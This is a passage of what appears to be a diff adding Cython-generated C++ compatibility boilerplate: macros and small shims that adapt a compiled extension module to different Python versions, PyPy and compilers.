CYTHON_COMPILING_IN_LIMITED_API 0 + #define CYTHON_COMPILING_IN_GRAAL 0 + #define CYTHON_COMPILING_IN_NOGIL 1 + #ifndef CYTHON_USE_TYPE_SLOTS + #define CYTHON_USE_TYPE_SLOTS 1 + #endif + #undef CYTHON_USE_PYTYPE_LOOKUP + #define CYTHON_USE_PYTYPE_LOOKUP 0 + #ifndef CYTHON_USE_ASYNC_SLOTS + #define CYTHON_USE_ASYNC_SLOTS 1 + #endif + #undef CYTHON_USE_PYLIST_INTERNALS + #define CYTHON_USE_PYLIST_INTERNALS 0 + #ifndef CYTHON_USE_UNICODE_INTERNALS + #define CYTHON_USE_UNICODE_INTERNALS 1 + #endif + #undef CYTHON_USE_UNICODE_WRITER + #define CYTHON_USE_UNICODE_WRITER 0 + #undef CYTHON_USE_PYLONG_INTERNALS + #define CYTHON_USE_PYLONG_INTERNALS 0 + #ifndef CYTHON_AVOID_BORROWED_REFS + #define CYTHON_AVOID_BORROWED_REFS 0 + #endif + #ifndef CYTHON_ASSUME_SAFE_MACROS + #define CYTHON_ASSUME_SAFE_MACROS 1 + #endif + #ifndef CYTHON_UNPACK_METHODS + #define CYTHON_UNPACK_METHODS 1 + #endif + #undef CYTHON_FAST_THREAD_STATE + #define CYTHON_FAST_THREAD_STATE 0 + #undef CYTHON_FAST_PYCALL + #define CYTHON_FAST_PYCALL 0 + #ifndef CYTHON_PEP489_MULTI_PHASE_INIT + #define CYTHON_PEP489_MULTI_PHASE_INIT 1 + #endif + #ifndef CYTHON_USE_TP_FINALIZE + #define CYTHON_USE_TP_FINALIZE 1 + #endif + #undef CYTHON_USE_DICT_VERSIONS + #define CYTHON_USE_DICT_VERSIONS 0 + #undef CYTHON_USE_EXC_INFO_STACK + #define CYTHON_USE_EXC_INFO_STACK 0 +#else + #define CYTHON_COMPILING_IN_PYPY 0 + #define CYTHON_COMPILING_IN_CPYTHON 1 + #define CYTHON_COMPILING_IN_LIMITED_API 0 + #define CYTHON_COMPILING_IN_GRAAL 0 + #define CYTHON_COMPILING_IN_NOGIL 0 + #ifndef CYTHON_USE_TYPE_SLOTS + #define CYTHON_USE_TYPE_SLOTS 1 + #endif + #ifndef CYTHON_USE_TYPE_SPECS + #define CYTHON_USE_TYPE_SPECS 0 + #endif + #ifndef CYTHON_USE_PYTYPE_LOOKUP + #define CYTHON_USE_PYTYPE_LOOKUP 1 + #endif + #if PY_MAJOR_VERSION < 3 + #undef CYTHON_USE_ASYNC_SLOTS + #define CYTHON_USE_ASYNC_SLOTS 0 + #elif !defined(CYTHON_USE_ASYNC_SLOTS) + #define CYTHON_USE_ASYNC_SLOTS 1 + #endif + #ifndef CYTHON_USE_PYLONG_INTERNALS + #define CYTHON_USE_PYLONG_INTERNALS 1 + #endif + #ifndef CYTHON_USE_PYLIST_INTERNALS + #define CYTHON_USE_PYLIST_INTERNALS 1 + #endif + #ifndef CYTHON_USE_UNICODE_INTERNALS + #define CYTHON_USE_UNICODE_INTERNALS 1 + #endif + #if PY_VERSION_HEX < 0x030300F0 || PY_VERSION_HEX >= 0x030B00A2 + #undef CYTHON_USE_UNICODE_WRITER + #define CYTHON_USE_UNICODE_WRITER 0 + #elif !defined(CYTHON_USE_UNICODE_WRITER) + #define CYTHON_USE_UNICODE_WRITER 1 + #endif + #ifndef CYTHON_AVOID_BORROWED_REFS + #define CYTHON_AVOID_BORROWED_REFS 0 + #endif + #ifndef CYTHON_ASSUME_SAFE_MACROS + #define CYTHON_ASSUME_SAFE_MACROS 1 + #endif + #ifndef CYTHON_UNPACK_METHODS + #define CYTHON_UNPACK_METHODS 1 + #endif + #ifndef CYTHON_FAST_THREAD_STATE + #define CYTHON_FAST_THREAD_STATE 1 + #endif + #ifndef CYTHON_FAST_GIL + #define CYTHON_FAST_GIL (PY_MAJOR_VERSION < 3 || PY_VERSION_HEX >= 0x03060000 && PY_VERSION_HEX < 0x030C00A6) + #endif + #ifndef CYTHON_METH_FASTCALL + #define CYTHON_METH_FASTCALL (PY_VERSION_HEX >= 0x030700A1) + #endif + #ifndef CYTHON_FAST_PYCALL + #define CYTHON_FAST_PYCALL 1 + #endif + #ifndef CYTHON_PEP487_INIT_SUBCLASS + #define CYTHON_PEP487_INIT_SUBCLASS 1 + #endif + #if PY_VERSION_HEX < 0x03050000 + #undef CYTHON_PEP489_MULTI_PHASE_INIT + #define CYTHON_PEP489_MULTI_PHASE_INIT 0 + #elif !defined(CYTHON_PEP489_MULTI_PHASE_INIT) + #define CYTHON_PEP489_MULTI_PHASE_INIT 1 + #endif + #ifndef CYTHON_USE_MODULE_STATE + #define CYTHON_USE_MODULE_STATE 0 + #endif + #if PY_VERSION_HEX < 0x030400a1 + #undef CYTHON_USE_TP_FINALIZE + #define CYTHON_USE_TP_FINALIZE 0 + #elif !defined(CYTHON_USE_TP_FINALIZE) + #define CYTHON_USE_TP_FINALIZE 1 + #endif + #if PY_VERSION_HEX < 0x030600B1 + #undef CYTHON_USE_DICT_VERSIONS + #define CYTHON_USE_DICT_VERSIONS 0 + #elif !defined(CYTHON_USE_DICT_VERSIONS) + #define CYTHON_USE_DICT_VERSIONS (PY_VERSION_HEX < 0x030C00A5) + #endif + #if PY_VERSION_HEX < 0x030700A3 + #undef CYTHON_USE_EXC_INFO_STACK + #define CYTHON_USE_EXC_INFO_STACK 0 + #elif !defined(CYTHON_USE_EXC_INFO_STACK) + #define CYTHON_USE_EXC_INFO_STACK 1 + #endif + #ifndef CYTHON_UPDATE_DESCRIPTOR_DOC + #define CYTHON_UPDATE_DESCRIPTOR_DOC 1 + #endif +#endif +#if !defined(CYTHON_FAST_PYCCALL) +#define CYTHON_FAST_PYCCALL (CYTHON_FAST_PYCALL && PY_VERSION_HEX >= 0x030600B1) +#endif +#if !defined(CYTHON_VECTORCALL) +#define CYTHON_VECTORCALL (CYTHON_FAST_PYCCALL && PY_VERSION_HEX >= 0x030800B1) +#endif +#define CYTHON_BACKPORT_VECTORCALL (CYTHON_METH_FASTCALL && PY_VERSION_HEX < 0x030800B1) +#if CYTHON_USE_PYLONG_INTERNALS + #if PY_MAJOR_VERSION < 3 + #include "longintrepr.h" + #endif + #undef SHIFT + #undef BASE + #undef MASK + #ifdef SIZEOF_VOID_P + enum { __pyx_check_sizeof_voidp = 1 / (int)(SIZEOF_VOID_P == sizeof(void*)) }; + #endif +#endif +#ifndef __has_attribute + #define __has_attribute(x) 0 +#endif +#ifndef __has_cpp_attribute + #define __has_cpp_attribute(x) 0 +#endif +#ifndef CYTHON_RESTRICT + #if defined(__GNUC__) + #define CYTHON_RESTRICT __restrict__ + #elif defined(_MSC_VER) && _MSC_VER >= 1400 + #define CYTHON_RESTRICT __restrict + #elif defined (__STDC_VERSION__) && __STDC_VERSION__ >= 199901L + #define CYTHON_RESTRICT restrict + #else + #define CYTHON_RESTRICT + #endif +#endif +#ifndef CYTHON_UNUSED + #if defined(__cplusplus) + /* for clang __has_cpp_attribute(maybe_unused) is true even before C++17 + * but leads to warnings with -pedantic, since it is a C++17 feature */ + #if ((defined(_MSVC_LANG) && _MSVC_LANG >= 201703L) || __cplusplus >= 201703L) + #if __has_cpp_attribute(maybe_unused) + #define CYTHON_UNUSED [[maybe_unused]] + #endif + #endif + #endif +#endif +#ifndef CYTHON_UNUSED +# if defined(__GNUC__) +# if !(defined(__cplusplus)) || (__GNUC__ > 3 || (__GNUC__ == 3 && __GNUC_MINOR__ >= 4)) +# define CYTHON_UNUSED __attribute__ ((__unused__)) +# else +# define CYTHON_UNUSED +# endif +# elif defined(__ICC) || (defined(__INTEL_COMPILER) && !defined(_MSC_VER)) +# define CYTHON_UNUSED __attribute__ ((__unused__)) +# else +# define CYTHON_UNUSED +# endif +#endif +#ifndef CYTHON_UNUSED_VAR +# if defined(__cplusplus) + template void CYTHON_UNUSED_VAR( const T& ) { } +# else +# define CYTHON_UNUSED_VAR(x) (void)(x) +# endif +#endif +#ifndef CYTHON_MAYBE_UNUSED_VAR + #define CYTHON_MAYBE_UNUSED_VAR(x) CYTHON_UNUSED_VAR(x) +#endif +#ifndef CYTHON_NCP_UNUSED +# if CYTHON_COMPILING_IN_CPYTHON +# define CYTHON_NCP_UNUSED +# else +# define CYTHON_NCP_UNUSED CYTHON_UNUSED +# endif +#endif +#define __Pyx_void_to_None(void_result) ((void)(void_result), Py_INCREF(Py_None), Py_None) +#ifdef _MSC_VER + #ifndef _MSC_STDINT_H_ + #if _MSC_VER < 1300 + typedef unsigned char uint8_t; + typedef unsigned short uint16_t; + typedef unsigned int uint32_t; + #else + typedef unsigned __int8 uint8_t; + typedef unsigned __int16 uint16_t; + typedef unsigned __int32 uint32_t; + #endif + #endif + #if _MSC_VER < 1300 + #ifdef _WIN64 + typedef unsigned long long __pyx_uintptr_t; + #else + typedef unsigned int __pyx_uintptr_t; + #endif + #else + #ifdef _WIN64 + typedef unsigned __int64 __pyx_uintptr_t; + #else + typedef unsigned __int32 __pyx_uintptr_t; + #endif + #endif +#else + #include + typedef uintptr_t __pyx_uintptr_t; +#endif +#ifndef CYTHON_FALLTHROUGH + #if defined(__cplusplus) + /* for clang __has_cpp_attribute(fallthrough) is true even before C++17 + * but leads to warnings with -pedantic, since it is a C++17 feature */ + #if ((defined(_MSVC_LANG) && _MSVC_LANG >= 201703L) || __cplusplus >= 201703L) + #if __has_cpp_attribute(fallthrough) + #define CYTHON_FALLTHROUGH [[fallthrough]] + #endif + #endif + #ifndef CYTHON_FALLTHROUGH + #if __has_cpp_attribute(clang::fallthrough) + #define CYTHON_FALLTHROUGH [[clang::fallthrough]] + #elif __has_cpp_attribute(gnu::fallthrough) + #define CYTHON_FALLTHROUGH [[gnu::fallthrough]] + #endif + #endif + #endif + #ifndef CYTHON_FALLTHROUGH + #if __has_attribute(fallthrough) + #define CYTHON_FALLTHROUGH __attribute__((fallthrough)) + #else + #define CYTHON_FALLTHROUGH + #endif + #endif + #if defined(__clang__) && defined(__apple_build_version__) + #if __apple_build_version__ < 7000000 + #undef CYTHON_FALLTHROUGH + #define CYTHON_FALLTHROUGH + #endif + #endif +#endif +#ifdef __cplusplus + template + struct __PYX_IS_UNSIGNED_IMPL {static const bool value = T(0) < T(-1);}; + #define __PYX_IS_UNSIGNED(type) (__PYX_IS_UNSIGNED_IMPL::value) +#else + #define __PYX_IS_UNSIGNED(type) (((type)-1) > 0) +#endif +#if CYTHON_COMPILING_IN_PYPY == 1 + #define __PYX_NEED_TP_PRINT_SLOT (PY_VERSION_HEX >= 0x030800b4 && PY_VERSION_HEX < 0x030A0000) +#else + #define __PYX_NEED_TP_PRINT_SLOT (PY_VERSION_HEX >= 0x030800b4 && PY_VERSION_HEX < 0x03090000) +#endif +#define __PYX_REINTERPRET_FUNCION(func_pointer, other_pointer) ((func_pointer)(void(*)(void))(other_pointer)) + +#ifndef __cplusplus + #error "Cython files generated with the C++ option must be compiled with a C++ compiler." +#endif +#ifndef CYTHON_INLINE + #if defined(__clang__) + #define CYTHON_INLINE __inline__ __attribute__ ((__unused__)) + #else + #define CYTHON_INLINE inline + #endif +#endif +template +void __Pyx_call_destructor(T& x) { + x.~T(); +} +template +class __Pyx_FakeReference { + public: + __Pyx_FakeReference() : ptr(NULL) { } + __Pyx_FakeReference(const T& ref) : ptr(const_cast(&ref)) { } + T *operator->() { return ptr; } + T *operator&() { return ptr; } + operator T&() { return *ptr; } + template bool operator ==(const U& other) const { return *ptr == other; } + template bool operator !=(const U& other) const { return *ptr != other; } + template bool operator==(const __Pyx_FakeReference& other) const { return *ptr == *other.ptr; } + template bool operator!=(const __Pyx_FakeReference& other) const { return *ptr != *other.ptr; } + private: + T *ptr; +}; + +#define __PYX_BUILD_PY_SSIZE_T "n" +#define CYTHON_FORMAT_SSIZE_T "z" +#if PY_MAJOR_VERSION < 3 + #define __Pyx_BUILTIN_MODULE_NAME "__builtin__" + #define __Pyx_DefaultClassType PyClass_Type + #define __Pyx_PyCode_New(a, p, k, l, s, f, code, c, n, v, fv, cell, fn, name, fline, lnos)\ + PyCode_New(a+k, l, s, f, code, c, n, v, fv, cell, fn, name, fline, lnos) +#else + #define __Pyx_BUILTIN_MODULE_NAME "builtins" + #define __Pyx_DefaultClassType PyType_Type +#if PY_VERSION_HEX >= 0x030B00A1 + static CYTHON_INLINE PyCodeObject* __Pyx_PyCode_New(int a, int p, int k, int l, int s, int f, + PyObject *code, PyObject *c, PyObject* n, PyObject *v, + PyObject *fv, PyObject *cell, PyObject* fn, + PyObject *name, int fline, PyObject *lnos) { + PyObject *kwds=NULL, *argcount=NULL, *posonlyargcount=NULL, *kwonlyargcount=NULL; + PyObject *nlocals=NULL, *stacksize=NULL, *flags=NULL, *replace=NULL, *empty=NULL; + const char *fn_cstr=NULL; + const char *name_cstr=NULL; + PyCodeObject *co=NULL, *result=NULL; + PyObject *type, *value, *traceback; + PyErr_Fetch(&type, &value, &traceback); + if (!(kwds=PyDict_New())) goto end; + if (!(argcount=PyLong_FromLong(a))) goto end; + if (PyDict_SetItemString(kwds, "co_argcount", argcount) != 0) goto end; + if (!(posonlyargcount=PyLong_FromLong(p))) goto end; + if (PyDict_SetItemString(kwds, "co_posonlyargcount", posonlyargcount) != 0) goto end; + if (!(kwonlyargcount=PyLong_FromLong(k))) goto end; + if (PyDict_SetItemString(kwds, "co_kwonlyargcount", kwonlyargcount) != 0) goto end; + if (!(nlocals=PyLong_FromLong(l))) goto end; + if (PyDict_SetItemString(kwds, "co_nlocals", nlocals) != 0) goto end; + if (!(stacksize=PyLong_FromLong(s))) goto end; + if (PyDict_SetItemString(kwds, "co_stacksize", stacksize) != 0) goto end; + if (!(flags=PyLong_FromLong(f))) goto end; + if (PyDict_SetItemString(kwds, "co_flags", flags) != 0) goto end; + if (PyDict_SetItemString(kwds, "co_code", code) != 0) goto end; + if (PyDict_SetItemString(kwds, "co_consts", c) != 0) goto end; + if (PyDict_SetItemString(kwds, "co_names", n) != 0) goto end; + if (PyDict_SetItemString(kwds, "co_varnames", v) != 0) goto end; + if (PyDict_SetItemString(kwds, "co_freevars", fv) != 0) goto end; + if (PyDict_SetItemString(kwds, "co_cellvars", cell) != 0) goto end; + if (PyDict_SetItemString(kwds, "co_linetable", lnos) != 0) goto end; + if (!(fn_cstr=PyUnicode_AsUTF8AndSize(fn, NULL))) goto end; + if (!(name_cstr=PyUnicode_AsUTF8AndSize(name, NULL))) goto end; + if (!(co = PyCode_NewEmpty(fn_cstr, name_cstr, fline))) goto end; + if (!(replace = PyObject_GetAttrString((PyObject*)co, "replace"))) goto end; + if (!(empty = PyTuple_New(0))) goto end; + result = (PyCodeObject*) PyObject_Call(replace, empty, kwds); + end: + Py_XDECREF((PyObject*) co); + Py_XDECREF(kwds); + Py_XDECREF(argcount); + Py_XDECREF(posonlyargcount); + Py_XDECREF(kwonlyargcount); + Py_XDECREF(nlocals); + Py_XDECREF(stacksize); + Py_XDECREF(replace); + Py_XDECREF(empty); + if (type) { + PyErr_Restore(type, value, traceback); + } + return result; + } +#elif PY_VERSION_HEX >= 0x030800B2 && !CYTHON_COMPILING_IN_PYPY + #define __Pyx_PyCode_New(a, p, k, l, s, f, code, c, n, v, fv, cell, fn, name, fline, lnos)\ + PyCode_NewWithPosOnlyArgs(a, p, k, l, s, f, code, c, n, v, fv, cell, fn, name, fline, lnos) +#else + #define __Pyx_PyCode_New(a, p, k, l, s, f, code, c, n, v, fv, cell, fn, name, fline, lnos)\ + PyCode_New(a, k, l, s, f, code, c, n, v, fv, cell, fn, name, fline, lnos) +#endif +#endif +#if PY_VERSION_HEX >= 0x030900A4 || defined(Py_IS_TYPE) + #define __Pyx_IS_TYPE(ob, type) Py_IS_TYPE(ob, type) +#else + #define __Pyx_IS_TYPE(ob, type) (((const PyObject*)ob)->ob_type == (type)) +#endif +#if PY_VERSION_HEX >= 0x030A00B1 || defined(Py_Is) + #define __Pyx_Py_Is(x, y) Py_Is(x, y) +#else + #define __Pyx_Py_Is(x, y) ((x) == (y)) +#endif +#if PY_VERSION_HEX >= 0x030A00B1 || defined(Py_IsNone) + #define __Pyx_Py_IsNone(ob) Py_IsNone(ob) +#else + #define __Pyx_Py_IsNone(ob) __Pyx_Py_Is((ob), Py_None) +#endif +#if PY_VERSION_HEX >= 0x030A00B1 || defined(Py_IsTrue) + #define __Pyx_Py_IsTrue(ob) Py_IsTrue(ob) +#else + #define __Pyx_Py_IsTrue(ob) __Pyx_Py_Is((ob), Py_True) +#endif +#if PY_VERSION_HEX >= 0x030A00B1 || defined(Py_IsFalse) + #define __Pyx_Py_IsFalse(ob) Py_IsFalse(ob) +#else + #define __Pyx_Py_IsFalse(ob) __Pyx_Py_Is((ob), Py_False) +#endif +#define __Pyx_NoneAsNull(obj) (__Pyx_Py_IsNone(obj) ? NULL : (obj)) +#if PY_VERSION_HEX >= 0x030900F0 && !CYTHON_COMPILING_IN_PYPY + #define __Pyx_PyObject_GC_IsFinalized(o) PyObject_GC_IsFinalized(o) +#else + #define __Pyx_PyObject_GC_IsFinalized(o) _PyGC_FINALIZED(o) +#endif +#ifndef CO_COROUTINE + #define CO_COROUTINE 0x80 +#endif +#ifndef CO_ASYNC_GENERATOR + #define CO_ASYNC_GENERATOR 0x200 +#endif +#ifndef Py_TPFLAGS_CHECKTYPES + #define Py_TPFLAGS_CHECKTYPES 0 +#endif +#ifndef Py_TPFLAGS_HAVE_INDEX + #define Py_TPFLAGS_HAVE_INDEX 0 +#endif +#ifndef Py_TPFLAGS_HAVE_NEWBUFFER + #define Py_TPFLAGS_HAVE_NEWBUFFER 0 +#endif +#ifndef Py_TPFLAGS_HAVE_FINALIZE + #define Py_TPFLAGS_HAVE_FINALIZE 0 +#endif +#ifndef Py_TPFLAGS_SEQUENCE + #define Py_TPFLAGS_SEQUENCE 0 +#endif +#ifndef Py_TPFLAGS_MAPPING + #define Py_TPFLAGS_MAPPING 0 +#endif +#ifndef METH_STACKLESS + #define METH_STACKLESS 0 +#endif +#if PY_VERSION_HEX <= 0x030700A3 || !defined(METH_FASTCALL) + #ifndef METH_FASTCALL + #define METH_FASTCALL 0x80 + #endif + typedef PyObject *(*__Pyx_PyCFunctionFast) (PyObject *self, PyObject *const *args, Py_ssize_t nargs); + typedef PyObject *(*__Pyx_PyCFunctionFastWithKeywords) (PyObject *self, PyObject *const *args, + Py_ssize_t nargs, PyObject *kwnames); +#else + #define __Pyx_PyCFunctionFast _PyCFunctionFast + #define __Pyx_PyCFunctionFastWithKeywords _PyCFunctionFastWithKeywords +#endif +#if CYTHON_METH_FASTCALL + #define __Pyx_METH_FASTCALL METH_FASTCALL + #define __Pyx_PyCFunction_FastCall __Pyx_PyCFunctionFast + #define __Pyx_PyCFunction_FastCallWithKeywords __Pyx_PyCFunctionFastWithKeywords +#else + #define __Pyx_METH_FASTCALL METH_VARARGS + #define __Pyx_PyCFunction_FastCall PyCFunction + #define __Pyx_PyCFunction_FastCallWithKeywords PyCFunctionWithKeywords +#endif +#if CYTHON_VECTORCALL + #define __pyx_vectorcallfunc vectorcallfunc + #define __Pyx_PY_VECTORCALL_ARGUMENTS_OFFSET PY_VECTORCALL_ARGUMENTS_OFFSET + #define __Pyx_PyVectorcall_NARGS(n) PyVectorcall_NARGS((size_t)(n)) +#elif CYTHON_BACKPORT_VECTORCALL + typedef PyObject *(*__pyx_vectorcallfunc)(PyObject *callable, PyObject *const *args, + size_t nargsf, PyObject *kwnames); + #define __Pyx_PY_VECTORCALL_ARGUMENTS_OFFSET ((size_t)1 << (8 * sizeof(size_t) - 1)) + #define __Pyx_PyVectorcall_NARGS(n) ((Py_ssize_t)(((size_t)(n)) & ~__Pyx_PY_VECTORCALL_ARGUMENTS_OFFSET)) +#else + #define __Pyx_PY_VECTORCALL_ARGUMENTS_OFFSET 0 + #define __Pyx_PyVectorcall_NARGS(n) ((Py_ssize_t)(n)) +#endif +#if PY_VERSION_HEX < 0x030900B1 + #define __Pyx_PyType_FromModuleAndSpec(m, s, b) ((void)m, PyType_FromSpecWithBases(s, b)) + typedef PyObject *(*__Pyx_PyCMethod)(PyObject *, PyTypeObject *, PyObject *const *, size_t, PyObject *); +#else + #define __Pyx_PyType_FromModuleAndSpec(m, s, b) PyType_FromModuleAndSpec(m, s, b) + #define __Pyx_PyCMethod PyCMethod +#endif +#ifndef METH_METHOD + #define METH_METHOD 0x200 +#endif +#if CYTHON_COMPILING_IN_PYPY && !defined(PyObject_Malloc) + #define PyObject_Malloc(s) PyMem_Malloc(s) + #define PyObject_Free(p) PyMem_Free(p) + #define PyObject_Realloc(p) PyMem_Realloc(p) +#endif +#if CYTHON_COMPILING_IN_LIMITED_API + #define __Pyx_PyCode_HasFreeVars(co) (PyCode_GetNumFree(co) > 0) + #define __Pyx_PyFrame_SetLineNumber(frame, lineno) +#else + #define __Pyx_PyCode_HasFreeVars(co) (PyCode_GetNumFree(co) > 0) + #define __Pyx_PyFrame_SetLineNumber(frame, lineno) (frame)->f_lineno = (lineno) +#endif +#if CYTHON_COMPILING_IN_LIMITED_API + #define __Pyx_PyThreadState_Current PyThreadState_Get() +#elif !CYTHON_FAST_THREAD_STATE + #define __Pyx_PyThreadState_Current PyThreadState_GET() +#elif PY_VERSION_HEX >= 0x03060000 + #define __Pyx_PyThreadState_Current _PyThreadState_UncheckedGet() +#elif PY_VERSION_HEX >= 0x03000000 + #define __Pyx_PyThreadState_Current PyThreadState_GET() +#else + #define __Pyx_PyThreadState_Current _PyThreadState_Current +#endif +#if CYTHON_COMPILING_IN_LIMITED_API +static CYTHON_INLINE void *__Pyx_PyModule_GetState(PyObject *op) +{ + void *result; + result = PyModule_GetState(op); + if (!result) + Py_FatalError("Couldn't find the module state"); + return result; +} +#endif +#define __Pyx_PyObject_GetSlot(obj, name, func_ctype) __Pyx_PyType_GetSlot(Py_TYPE(obj), name, func_ctype) +#if CYTHON_COMPILING_IN_LIMITED_API + #define __Pyx_PyType_GetSlot(type, name, func_ctype) ((func_ctype) PyType_GetSlot((type), Py_##name)) +#else + #define __Pyx_PyType_GetSlot(type, name, func_ctype) ((type)->name) +#endif +#if PY_VERSION_HEX < 0x030700A2 && !defined(PyThread_tss_create) && !defined(Py_tss_NEEDS_INIT) +#include "pythread.h" +#define Py_tss_NEEDS_INIT 0 +typedef int Py_tss_t; +static CYTHON_INLINE int PyThread_tss_create(Py_tss_t *key) { + *key = PyThread_create_key(); + return 0; +} +static CYTHON_INLINE Py_tss_t * PyThread_tss_alloc(void) { + Py_tss_t *key = (Py_tss_t *)PyObject_Malloc(sizeof(Py_tss_t)); + *key = Py_tss_NEEDS_INIT; + return key; +} +static CYTHON_INLINE void PyThread_tss_free(Py_tss_t *key) { + PyObject_Free(key); +} +static CYTHON_INLINE int PyThread_tss_is_created(Py_tss_t *key) { + return *key != Py_tss_NEEDS_INIT; +} +static CYTHON_INLINE void PyThread_tss_delete(Py_tss_t *key) { + PyThread_delete_key(*key); + *key = Py_tss_NEEDS_INIT; +} +static CYTHON_INLINE int PyThread_tss_set(Py_tss_t *key, void *value) { + return PyThread_set_key_value(*key, value); +} +static CYTHON_INLINE void * PyThread_tss_get(Py_tss_t *key) { + return PyThread_get_key_value(*key); +} +#endif +#if PY_MAJOR_VERSION < 3 + #if CYTHON_COMPILING_IN_PYPY + #if PYPY_VERSION_NUM < 0x07030600 + #if defined(__cplusplus) && __cplusplus >= 201402L + [[deprecated("`with nogil:` inside a nogil function will not release the GIL in PyPy2 < 7.3.6")]] + #elif defined(__GNUC__) || defined(__clang__) + __attribute__ ((__deprecated__("`with nogil:` inside a nogil function will not release the GIL in PyPy2 < 7.3.6"))) + #elif defined(_MSC_VER) + __declspec(deprecated("`with nogil:` inside a nogil function will not release the GIL in PyPy2 < 7.3.6")) + #endif + static CYTHON_INLINE int PyGILState_Check(void) { + return 0; + } + #else // PYPY_VERSION_NUM < 0x07030600 + #endif // PYPY_VERSION_NUM < 0x07030600 + #else + static CYTHON_INLINE int PyGILState_Check(void) { + PyThreadState * tstate = _PyThreadState_Current; + return tstate && (tstate == PyGILState_GetThisThreadState()); + } + #endif +#endif +#if CYTHON_COMPILING_IN_CPYTHON || defined(_PyDict_NewPresized) +#define __Pyx_PyDict_NewPresized(n) ((n <= 8) ? PyDict_New() : _PyDict_NewPresized(n)) +#else +#define __Pyx_PyDict_NewPresized(n) PyDict_New() +#endif +#if PY_MAJOR_VERSION >= 3 || CYTHON_FUTURE_DIVISION + #define __Pyx_PyNumber_Divide(x,y) PyNumber_TrueDivide(x,y) + #define __Pyx_PyNumber_InPlaceDivide(x,y) PyNumber_InPlaceTrueDivide(x,y) +#else + #define __Pyx_PyNumber_Divide(x,y) PyNumber_Divide(x,y) + #define __Pyx_PyNumber_InPlaceDivide(x,y) PyNumber_InPlaceDivide(x,y) +#endif +#if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX > 0x030600B4 && CYTHON_USE_UNICODE_INTERNALS +#define __Pyx_PyDict_GetItemStrWithError(dict, name) _PyDict_GetItem_KnownHash(dict, name, ((PyASCIIObject *) name)->hash) +static CYTHON_INLINE PyObject * __Pyx_PyDict_GetItemStr(PyObject *dict, PyObject *name) { + PyObject *res = __Pyx_PyDict_GetItemStrWithError(dict, name); + if (res == NULL) PyErr_Clear(); + return res; +} +#elif PY_MAJOR_VERSION >= 3 && (!CYTHON_COMPILING_IN_PYPY || PYPY_VERSION_NUM >= 0x07020000) +#define __Pyx_PyDict_GetItemStrWithError PyDict_GetItemWithError +#define __Pyx_PyDict_GetItemStr PyDict_GetItem +#else +static CYTHON_INLINE PyObject * __Pyx_PyDict_GetItemStrWithError(PyObject *dict, PyObject *name) { +#if CYTHON_COMPILING_IN_PYPY + return PyDict_GetItem(dict, name); +#else + PyDictEntry *ep; + PyDictObject *mp = (PyDictObject*) dict; + long hash = ((PyStringObject *) name)->ob_shash; + assert(hash != -1); + ep = (mp->ma_lookup)(mp, name, hash); + if (ep == NULL) { + return NULL; + } + return ep->me_value; +#endif +} +#define __Pyx_PyDict_GetItemStr PyDict_GetItem +#endif +#if CYTHON_USE_TYPE_SLOTS + #define __Pyx_PyType_GetFlags(tp) (((PyTypeObject *)tp)->tp_flags) + #define __Pyx_PyType_HasFeature(type, feature) ((__Pyx_PyType_GetFlags(type) & (feature)) != 0) + #define __Pyx_PyObject_GetIterNextFunc(obj) (Py_TYPE(obj)->tp_iternext) +#else + #define __Pyx_PyType_GetFlags(tp) (PyType_GetFlags((PyTypeObject *)tp)) + #define __Pyx_PyType_HasFeature(type, feature) PyType_HasFeature(type, feature) + #define __Pyx_PyObject_GetIterNextFunc(obj) PyIter_Next +#endif +#if CYTHON_USE_TYPE_SPECS && PY_VERSION_HEX >= 0x03080000 +#define __Pyx_PyHeapTypeObject_GC_Del(obj) {\ + PyTypeObject *type = Py_TYPE(obj);\ + assert(__Pyx_PyType_HasFeature(type, Py_TPFLAGS_HEAPTYPE));\ + PyObject_GC_Del(obj);\ + Py_DECREF(type);\ +} +#else +#define __Pyx_PyHeapTypeObject_GC_Del(obj) PyObject_GC_Del(obj) +#endif +#if CYTHON_COMPILING_IN_LIMITED_API + #define CYTHON_PEP393_ENABLED 1 + #define __Pyx_PyUnicode_READY(op) (0) + #define __Pyx_PyUnicode_GET_LENGTH(u) PyUnicode_GetLength(u) + #define __Pyx_PyUnicode_READ_CHAR(u, i) PyUnicode_ReadChar(u, i) + #define __Pyx_PyUnicode_MAX_CHAR_VALUE(u) ((void)u, 1114111U) + #define __Pyx_PyUnicode_KIND(u) ((void)u, (0)) + #define __Pyx_PyUnicode_DATA(u) ((void*)u) + #define __Pyx_PyUnicode_READ(k, d, i) ((void)k, PyUnicode_ReadChar((PyObject*)(d), i)) + #define __Pyx_PyUnicode_IS_TRUE(u) (0 != PyUnicode_GetLength(u)) +#elif PY_VERSION_HEX > 0x03030000 && defined(PyUnicode_KIND) + #define CYTHON_PEP393_ENABLED 1 + #if PY_VERSION_HEX >= 0x030C0000 + #define __Pyx_PyUnicode_READY(op) (0) + #else + #define __Pyx_PyUnicode_READY(op) (likely(PyUnicode_IS_READY(op)) ?\ + 0 : _PyUnicode_Ready((PyObject *)(op))) + #endif + #define __Pyx_PyUnicode_GET_LENGTH(u) PyUnicode_GET_LENGTH(u) + #define __Pyx_PyUnicode_READ_CHAR(u, i) PyUnicode_READ_CHAR(u, i) + #define __Pyx_PyUnicode_MAX_CHAR_VALUE(u) PyUnicode_MAX_CHAR_VALUE(u) + #define __Pyx_PyUnicode_KIND(u) ((int)PyUnicode_KIND(u)) + #define __Pyx_PyUnicode_DATA(u) PyUnicode_DATA(u) + #define __Pyx_PyUnicode_READ(k, d, i) PyUnicode_READ(k, d, i) + #define __Pyx_PyUnicode_WRITE(k, d, i, ch) PyUnicode_WRITE(k, d, i, (Py_UCS4) ch) + #if PY_VERSION_HEX >= 0x030C0000 + #define __Pyx_PyUnicode_IS_TRUE(u) (0 != PyUnicode_GET_LENGTH(u)) + #else + #if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX >= 0x03090000 + #define __Pyx_PyUnicode_IS_TRUE(u) (0 != (likely(PyUnicode_IS_READY(u)) ? PyUnicode_GET_LENGTH(u) : ((PyCompactUnicodeObject *)(u))->wstr_length)) + #else + #define __Pyx_PyUnicode_IS_TRUE(u) (0 != (likely(PyUnicode_IS_READY(u)) ? PyUnicode_GET_LENGTH(u) : PyUnicode_GET_SIZE(u))) + #endif + #endif +#else + #define CYTHON_PEP393_ENABLED 0 + #define PyUnicode_1BYTE_KIND 1 + #define PyUnicode_2BYTE_KIND 2 + #define PyUnicode_4BYTE_KIND 4 + #define __Pyx_PyUnicode_READY(op) (0) + #define __Pyx_PyUnicode_GET_LENGTH(u) PyUnicode_GET_SIZE(u) + #define 